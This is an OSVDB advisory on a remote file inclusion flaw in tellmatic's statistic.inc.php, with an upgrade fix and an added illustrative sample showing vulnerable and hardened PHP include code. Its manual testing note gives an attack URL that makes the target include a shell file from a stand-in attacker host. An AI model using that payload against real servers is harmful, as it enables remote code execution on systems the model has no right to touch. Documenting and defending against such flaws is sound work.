tellmatic statistic.inc.php tm_includepath Variable Remote File Inclusion

2007-12-01T00:00:00
ID OSVDB:39690
Type osvdb
Reporter OSVDB
Modified 2007-12-01T00:00:00

Description

Vulnerability Description

tellmatic contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'statistic.inc.php' not properly sanitizing user input supplied to the 'tm_includepath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 1.0.7.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
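The description above names the classic PHP remote-file-inclusion pattern: a request-controlled variable ends up in an include path, so a URL such as http://[attacker]/... is fetched and executed. The advisory does not reproduce tellmatic's source, so the following is an added, hypothetical illustration (not tellmatic's code, and not the fix that 1.0.7.3 applied) of that pattern next to a hardened version. The function names, the `include/` directory layout and the use of `$_GET` to stand in for however `tm_includepath` reached the script are assumptions.

```php
<?php
// Added example, not tellmatic's code. Illustrates the pattern the advisory
// describes and one defensive rewrite. Names and layout are hypothetical.

// Vulnerable pattern: request data becomes the include path. With
// allow_url_include enabled, an "http://..." value is fetched and executed.
function load_statistic_vulnerable(): void
{
    $tm_includepath = $_GET['tm_includepath'] ?? '';
    include $tm_includepath . '/statistic.inc.php';
}

// Hardened: the include path is never derived from request data. The
// directory is fixed, the file name comes from an allow-list, and the
// resolved path is checked to lie inside that directory.
const TM_INCLUDE_DIR = __DIR__ . '/include';   // hypothetical install layout

const TM_ALLOWED_INCLUDES = [
    'statistic' => 'statistic.inc.php',
];

function resolve_include(string $name): ?string
{
    if (!array_key_exists($name, TM_ALLOWED_INCLUDES)) {
        return null;                                   // unknown key: refuse
    }
    $base = realpath(TM_INCLUDE_DIR);
    $path = realpath(TM_INCLUDE_DIR . '/' . TM_ALLOWED_INCLUDES[$name]);
    // realpath() returns false for URLs and missing files; the prefix check
    // rejects anything that resolved outside the include directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function load_statistic_hardened(): void
{
    $file = resolve_include('statistic');
    if ($file === null) {
        http_response_code(404);
        exit;
    }
    include $file;
}
```

Two points a defender reviewing an install like this would also check: `allow_url_include=Off` in php.ini removes the remote half of the bug class server-wide regardless of application code, and the allow-list approach above is preferable to stripping `http://` from the value, because a filter-based fix still leaves local file inclusion and path traversal on the table.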

Short Description

tellmatic statistic.inc.php tm_includepath Variable Remote File Inclusion

Manual Testing Notes

http://[target]/tellmatic/include/statistic.inc.php?tm_includepath=http://[attacker]/shell.txt?

References:

Secunia Advisory ID: 27895
Related OSVDB ID: 1019179
Related OSVDB ID: 39691
Related OSVDB ID: 39692
Related OSVDB ID: 39693
Mail List Post: http://www.attrition.org/pipermail/vim/2007-December/001854.html
ISS X-Force ID: 38801
Generic Exploit URL: http://www.milw0rm.com/exploits/4684
CVE-2007-6231
Bugtraq ID: 26678